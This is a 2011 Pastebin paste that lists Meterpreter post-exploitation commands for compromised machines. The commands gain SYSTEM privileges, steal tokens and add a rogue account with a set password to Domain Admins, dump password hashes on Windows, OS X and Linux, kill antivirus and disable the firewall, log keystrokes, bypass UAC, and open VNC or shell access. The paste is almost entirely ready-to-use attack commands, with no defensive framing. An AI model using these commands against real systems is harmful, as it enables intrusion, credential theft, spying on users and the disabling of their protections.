API tools faq
paste
Guest User

Meterpreter Post Exploitation Commands

a guest
Aug 14th, 2011
5,989
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.12 KB | None | 0 0
raw download clone embed print report
  1. Elevate your permissions on Windows-based systems using Meterpreter:
  2. meterpreter > use priv
  3. meterpreter > getsystem
  4. Steal a domain administrator token from a given process ID, add a
  5. domain account, and then add it to the Domain Admins group:
  6. meterpreter > ps
  7. meterpreter > steal_token 1784
  8. meterpreter > shell
  9. C:\Windows\system32>net user metasploit p@55w0rd /ADD /DOMAIN
  10. C:\Windows\system32>net group "Domain Admins" metasploit /ADD /DOMAIN
  11. Dump password hashes from the SAM database:
  12. meterpreter > use priv
  13. meterpreter > getsystem
  14. meterpreter > hashdump
  15. NOTE On Win2k8 you may need to migrate to a process that is running as SYSTEM if
  16. getsystem and hashdump throw exceptions.
  17. Automigrate to a separate process:
  18. meterpreter > run migrate
  19. Kill antivirus processes running on the target via the killav Meterpreter
  20. script:
  21. meterpreter > run killav
  22. Capture keystrokes on target machines from within a particular process:
  23. meterpreter > ps
  24. meterpreter > migrate 1436
  25. meterpreter > keyscan_start
  26. meterpreter > keyscan_dump
  27. meterpreter > keyscan_stop
  28. Use Incognito to impersonate an administrator:
  29. meterpreter > use incognito
  30. meterpreter > list_tokens -u
  31. meterpreter > use priv
  32. meterpreter > getsystem
  33. meterpreter > list_tokens -u
  34. meterpreter > impersonate_token IHAZSECURITY\\Administrator
  35. See what protection mechanisms are in place on the compromised
  36. target, display the help menu, disable Windows Firewall, and kill all countermeasures
  37. found:
  38. meterpreter > run getcountermeasure
  39. meterpreter > run getcountermeasure -h
  40. meterpreter > run getcountermeasure -d -k
  41. Identify whether the compromised system is a virtual machine:
  42. meterpreter > run checkvm
  43. Drop into a command shell for a current Meterpreter console session:
  44. meterpreter > shell
  45. Get a remote GUI (VNC) on the target machine:
  46. meterpreter > run vnc
  47. Background a currently running Meterpreter console:
  48. meterpreter > background
  49. Bypass Windows User Access Control:
  50. meterpreter > run post/windows/escalate/bypassuac
  51. Dump Hashes on an OS X system:
  52. meterpreter > run post/osx/gather/hashdump
  53. Dump Hashes on a Linux system:
  54. meterpreter > run post/linux/gather/hashdump
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!